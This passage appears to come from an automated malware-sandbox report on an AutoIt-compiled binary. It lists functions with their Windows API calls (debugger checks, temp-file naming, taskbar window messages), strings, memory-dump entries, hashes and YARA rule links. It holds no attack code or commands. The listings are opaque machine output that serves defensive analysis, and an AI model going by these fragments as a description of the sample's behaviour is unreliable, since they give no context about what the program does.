                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: ClassMessageNameSend
                                                    • String ID: ComboBox$ListBox
                                                    • API String ID: 3678867486-1403004172
                                                    • Opcode ID: 9237f594af724eddfdb8ae2ee3893f6059ae6c9131ab4d63f48b0a7178a70f6a
                                                    • Instruction ID: e22630f37d99aca8034f2ef880a08287db029efd4d8c9fad1d66bac0856e2758
                                                    • Opcode Fuzzy Hash: 9237f594af724eddfdb8ae2ee3893f6059ae6c9131ab4d63f48b0a7178a70f6a
                                                    • Instruction Fuzzy Hash: 1F01F772A461047ADB02E7A0DC82FFF776CDF11390B24005EF901A71C1DA296F48977A
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 003FB511, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 23COMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 003E0B84: InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,?,003FB540,?,?,?,003C100A), ref: 003E0B89
                                                    • IsDebuggerPresent.KERNEL32(?,?,?,003C100A), ref: 003FB544
                                                    • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,003C100A), ref: 003FB553
                                                    Strings
                                                    • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 003FB54E
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString
                                                    • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                    • API String ID: 55579361-631824599
                                                    • Opcode ID: 6beb60cbd73be346657e8e61cc73720eada19138bc3dd71c1a3690a0092315b2
                                                    • Instruction ID: a36a09b26ea3d6987275d5e1016b4374cba7c6447585854452b79360075a7d64
                                                    • Opcode Fuzzy Hash: 6beb60cbd73be346657e8e61cc73720eada19138bc3dd71c1a3690a0092315b2
                                                    • Instruction Fuzzy Hash: 2BE092B41007558FD322EF28E909796BBE0FB01358F00897DE08AC6250E7F9A448CB76
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 004181BC, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 004181CA
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: Message
                                                    • String ID: AutoIt$Error allocating memory.
                                                    • API String ID: 2030045667-4017498283
                                                    • Opcode ID: 8febd33302d5bf4cf8e4b21b2994ab7a534b4aac838ff68f71133eabdf3516ef
                                                    • Instruction ID: e078500ba129a104cd203ace24d87408328f36c46f9f797780c1a3fd77027530
                                                    • Opcode Fuzzy Hash: 8febd33302d5bf4cf8e4b21b2994ab7a534b4aac838ff68f71133eabdf3516ef
                                                    • Instruction Fuzzy Hash: 32D05B323C537832D21633A56C0BFC676484B05B52F104427BB0C996D38DD65DC642DD
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00401D5F, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetSystemDirectoryW.KERNEL32(?), ref: 00401B9F
                                                      • Part of subcall function 0043C304: LoadLibraryA.KERNEL32(kernel32.dll,?,00401D88,?), ref: 0043C312
                                                      • Part of subcall function 0043C304: GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0043C324
                                                    • FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 00401D97
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: Library$AddressDirectoryFreeLoadProcSystem
                                                    • String ID: WIN_XPe
                                                    • API String ID: 582185067-3257408948
                                                    • Opcode ID: d607b05c7558e124b17d22c48c6185a2015a826757167248626c607a829deb19
                                                    • Instruction ID: 8d0f94303f60086a48b601ae1f108761c2bac5cb50b0702ef8b60ce28309ee4e
                                                    • Opcode Fuzzy Hash: d607b05c7558e124b17d22c48c6185a2015a826757167248626c607a829deb19
                                                    • Instruction Fuzzy Hash: EEF0C970814109DFDB15DB91C988AEDBBF8AB08304F5400AAE502B65A1E779AF85DF29
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00429B6D, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetTempPathW.KERNEL32(00000104,?), ref: 00429B82
                                                    • GetTempFileNameW.KERNEL32(?,aut,00000000,00000003), ref: 00429B99
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: Temp$FileNamePath
                                                    • String ID: aut
                                                    • API String ID: 3285503233-3010740371
                                                    • Opcode ID: 6450e9b92f4c0e3b2f7ace0fb0ccae1fbbb96fdecb7752da0cd5c890b3979e2b
                                                    • Instruction ID: 016bc7458b3609630719ecd8961dbdf9a00e4d227698ac337126a661c9875e8c
                                                    • Opcode Fuzzy Hash: 6450e9b92f4c0e3b2f7ace0fb0ccae1fbbb96fdecb7752da0cd5c890b3979e2b
                                                    • Instruction Fuzzy Hash: 10D05B7A54020D7BDB109BD0EC0EFFB772CE705345F0041B2F65490491C9B761988B65
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00401B3E, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17timeCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: LocalTime
                                                    • String ID: %.3d$WIN_XPe
                                                    • API String ID: 481472006-2409531811
                                                    • Opcode ID: d1a6bca64ce08f6b3327d150c27f364c89424533f9650bcc1045ebba41075390
                                                    • Instruction ID: 85c41c1df350b6eb28232bbf3e75795a2ca6c7fe0250d0785ce34f95a406ede8
                                                    • Opcode Fuzzy Hash: d1a6bca64ce08f6b3327d150c27f364c89424533f9650bcc1045ebba41075390
                                                    • Instruction Fuzzy Hash: 28D0EC75804118EACA159A908844DF9777CA704301F5005A3B506A2490F37DAB969B2A
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00445BEB, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00445BF5
                                                    • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00445C08
                                                      • Part of subcall function 004254E6: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 0042555E
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: FindMessagePostSleepWindow
                                                    • String ID: Shell_TrayWnd
                                                    • API String ID: 529655941-2988720461
                                                    • Opcode ID: e7e7b9c32e8572e80712c20760607b92bc8296822bfd56eb1766b8339d531c91
                                                    • Instruction ID: 6fe2307d033170ccbb21eb5d7841f285e463e24cb72e628f5aae5a58281fe650
                                                    • Opcode Fuzzy Hash: e7e7b9c32e8572e80712c20760607b92bc8296822bfd56eb1766b8339d531c91
                                                    • Instruction Fuzzy Hash: 5CD0C935388311B6E764BB70AC0BFD76A14AB41B51F11083AB649AA1D1D9F85805C658
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00445C1F, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00445C35
                                                    • PostMessageW.USER32(00000000), ref: 00445C3C
                                                      • Part of subcall function 004254E6: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 0042555E
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: FindMessagePostSleepWindow
                                                    • String ID: Shell_TrayWnd
                                                    • API String ID: 529655941-2988720461
                                                    • Opcode ID: 16243b35b064243f988e0571259f9df8cc96bf8956ac7cd0586437ba14ce9c91
                                                    • Instruction ID: d945b4402d5d5eccbb4cb3dfc2e4f825198afcaa16e61c5f907aca3b7e5a99be
                                                    • Opcode Fuzzy Hash: 16243b35b064243f988e0571259f9df8cc96bf8956ac7cd0586437ba14ce9c91
                                                    • Instruction Fuzzy Hash: 88D0A9313843107AF324BB30AC0BFC76610AB02B00F00083AB205AA0D1C8F86800C208
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%